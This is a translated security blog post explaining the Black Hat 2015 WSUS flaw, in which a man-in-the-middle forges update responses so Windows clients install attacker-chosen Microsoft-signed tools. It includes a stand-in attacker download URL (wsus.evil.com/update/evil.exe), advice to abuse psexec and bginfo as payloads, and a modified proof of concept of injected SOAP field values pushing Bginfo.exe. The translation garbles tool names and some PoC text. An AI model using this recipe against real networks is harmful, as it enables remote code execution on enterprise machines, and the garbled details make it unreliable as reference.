Blackhat: Theory and Practice of WSUS vulnerability Exploitation

Blackhat: Theory and Practice of WSUS vulnerability Exploitation

Paul Stone and Alex Chapman proposed a Windows Server Update Service (WSUS) vulnerability in Blackhat2015. Attackers can exploit this vulnerability by using Man In The Middle (MITM) to allow users to download and install forged updates.

As we all know, Microsoft provides users with updates through the Windows update service. The customer periodically runs wuauctl.exe to communicate with the Update Server to check whether there are new updates. If yes, download and install these updates. In an enterprise environment, repeated downloading of the same update by thousands of clients will undoubtedly cause a great waste of bandwidth. It is also difficult for administrators to effectively control update and installation.

Windows Server Update Service (WSUS) solves this problem. WSUS is an update proxy server: The WSUS server downloads updates from the Internet and caches them locally, and provides Update Services for other windows computers on the network. In this way, other windows computers on the network will download updates from this WSUS server, rather than from the Internet.

1. WSUS connection settings on the client
In the registry, check whether the UseWUServer value in HKLM \ Software \ Policies \ Microsoft \ Windows \ WindowsUpdate \ AU is 1 (1 is enabled, 0 is disabled ).

The specific connection settings of WSUS are saved in HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ WindowsUpdate \ WUServer for example, http://wsus-server.com: 8530, http is the underlying connection protocol, wsus-server.com is the domain name of the WSUS server, 8530 is the port number.


Of course, if the WSUS server supports http, we can also use https to replace http. However, Microsoft's default setting is http. In addition, most enterprises are reluctant to pay a high certificate fee to support https.

2. WSUS Protocol

WSUS uses soap xml messages encapsulated in HTTP for communication. The client first tells the Update Server which updates have been installed (SyncUpdates ). The Update Server Returns a result (SyncUpdatesResult), indicating which new updates can be provided to the client. The Client further queries the details of the new update (GetExtendedUpdateInfo ). Finally, the server is updated to inform the client of the specific information (GetExtendedUpdateInfoResult )., Note that SyncUpdates is sent twice. The first is for software updates and the second is for hardware driver updates.


Here is an intuitive example:

1. Client: I have installed update 1, 2, and 3 for software updates. Are there any new updates recently?

2. WSUS server: Yes! I have updated the information on the 4th. you can install it.

3. (hardware synchronization is omitted)

4. (the result of synchronous hardware update is omitted)

5. Client: I want to install software update 4. Can I provide details?

6. WSUS server: Okay. You can download update 4 from http: // 1.2.3.4/update/4. cab. Note that its Sha1 hash value is A1.. FF.

After the download, the client checks the updated hash value and signature. If everything is normal, the client automatically installs the update or notifies you to manually install the update.

3. Risks

By default, WSUS servers only Support http. We know that http itself is not secure and cannot guarantee the confidentiality and integrity of the message, nor allow the client to authenticate the server. Therefore, attackers can use Man In The Middle (MITM) to hijack WSUS communication and insert forged updates to spoof The client. Many methods can be used for man-in-the-middle attacks, such as arp spoofing, which is not discussed here. This article focuses on how to forge WSUS messages.
Attackers can insert a forged update ID in SyncUpdatesResult, and then continue to provide forged URLs in GetExtendedUpdateInfoResult to cheat the client in downloading and installing it, as shown in

An example of an attack is as follows:

1. Client: I have installed update 1, 2, and 3 for software updates. Are there any new updates recently?

2. WSUS server: No.

3. Attacker: Yes! I have updated the information on the 4th. you can install it.

4. (hardware synchronization is omitted)

5. (The hardware Synchronization Update result is omitted)

6. Client: I want to install software update 4. Can I provide details?

7. Attacker: Okay. You can download Update 4 from http://wsus.evil.com/update/evil.exe. note that its Sha1 hash value is BF... EF.

In this case, the client downloads evil.exe from the http://wsus.evil.com/update. Note that there is also a protection mechanism: all downloaded software updates must be signed by Microsoft. If the signature verification fails, the downloaded update will be deleted immediately. We know that Microsoft's signature is still difficult to forge. Is there no way to do it?

In fact, there is no need to forge a signature. Think about software that has been signed by Microsoft, especially the sysinternals tool, many of which can be used to do bad things, such as javasxec and bginfo, all programs with Microsoft signatures. (The first example is "cmd.exe, but cmd.exe is not actually signed by Microsoft)

1. Small xec: lightweight telnet (http://baike.baidu.com/view/555225.htm)

2. bginfo: vbs script (https://technet.microsoft.com/zh-cn/2007.08.utilityspotlight) can be executed)

In this way, attackers can pretend to update the psexec or bginfo, configure it with a constructed installation script, and push it to the client for installation and running.

4. Proof Of Concept (POC)

The POC provided by Paul Stone and Alex Chapman seems to have some bugs, at least I didn't test it successfully. Here I provide a modified POC. The objective of this POC is to disguise bginfo as an update and push it to the client for download and installation.

I hijack and modify WSUS messages locally using burp suite

1. Insert the following message into the first SyncUpdatesResult message, before false
19999992
199992
Bundle
True
Septem
0
0
0
0
True

19999993
199993
Install
True

0
0
0
0
True
 
2. The second SyncUpdatesResult message is about the hardware driver. You do not need to modify it.
3. Delete 19999992 19999993 in the GetExtendedUpdateInfo message, and
4. In the GetExtendedUpdateInfoResult message... Adding

19999992
A2LNbnsxirmkx02vIp8Ru3laLOVT6gJMtJFDRWwnxB0 =
 
19999993
Http://support.microsoft. comMS15-0413037581
 
19999992
Enanything-in-here
 
19999993
EnA fake update exampleFreebuf is good... http://support.microsoft.com/kb/3037581http://support.microsoft.com
 
In... Adding
HO4/qEGb30y8JmRhJ34/3ZuT3iU =
Http: // yoururl/archive/Bginfo.exe
Set yoururl in the Url tag to your host name.
After the job is closed, the client accepts the forged update information.

Check the updated information.

It is found that bginfo.exe has been downloaded to the local device.

Try to install it!